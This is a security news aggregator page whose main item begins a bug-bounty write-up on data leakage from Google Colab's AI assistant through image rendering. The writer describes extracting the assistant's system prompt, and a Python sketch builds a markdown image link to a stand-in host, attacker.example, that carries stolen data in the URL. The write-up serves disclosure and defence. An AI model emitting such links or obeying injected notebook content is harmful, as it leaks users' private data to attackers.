Aggregator
See Malicious Process Relationships on a Visual Graph
At ANY.RUN, we’re all about making in-depth technical information accessible. One of the ways we do this is by providing you with various detailed, yet easy-to-understand reports on malware behavior. One such report is the Process graph. What is a Process graph? It is a report that visually shows how system processes, especially malicious ones, relate […]
How Many Nuclear Weapons Does the United States Have in 2024?
12 Ways to Quickly Break a Person During Interrogation
Talk Showcase | A Journey into Windows Remote File Protocol Vulnerability Hunting
Patchwork Hacking Group Targets Chinese Tech Universities to Steal Core Data!
Vector Search with 95% Fewer Resources | DiskANN with Cloud Search
A Summary of Large Language Model Applications in Cybersecurity
Critical Docker Engine Flaw Allows Attackers to Bypass Authorization Plugins
CISA Warns of Exploitable Vulnerabilities in Popular BIND 9 DNS Software
New Chrome Feature Scans Password-Protected Files for Malicious Content
Google Colab AI: Data Leakage Through Image Rendering Fixed. Some Risks Remain.
Google Colab AI, now just called Gemini in Colab, was vulnerable to data leakage via image rendering.
This is an older bug report, dating back to November 29, 2023. However, recent events prompted me to write this up:
- Google did not reward this finding, and
- Colab now automatically puts Notebook content (untrusted data) into the prompt.
Let’s explore the specifics.
Google Colab AI - Revealing the System Prompt
At the end of November last year, I noticed that there was a “Colab AI” feature, which integrated an LLM to chat with and write code. Naturally, I grabbed the system prompt, and it contained instructions that begged the LLM not to render images.
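To see why a system prompt would plead against image rendering, here is a minimal sketch of the underlying exfiltration technique. The attacker host, function name, and payload are all hypothetical illustrations, not code from the actual bug report: if an LLM can be tricked into emitting a markdown image whose URL embeds sensitive data, the client fetches that URL when rendering, and the data lands in the attacker's server logs.

```python
from urllib.parse import quote

def exfil_image_markdown(secret: str, attacker_host: str = "attacker.example") -> str:
    """Build a markdown image tag whose URL carries `secret` as a query
    parameter. If the chat UI renders the image, it issues an HTTP GET
    to this URL, delivering the secret to the attacker's server."""
    return f"![x](https://{attacker_host}/log?q={quote(secret)})"

# An injected prompt would instruct the model to output something like:
print(exfil_image_markdown("user chat history"))
```

This is why "don't render images" instructions alone are a weak defense: the mitigation has to happen in the client (e.g., blocking untrusted image domains), not in the prompt.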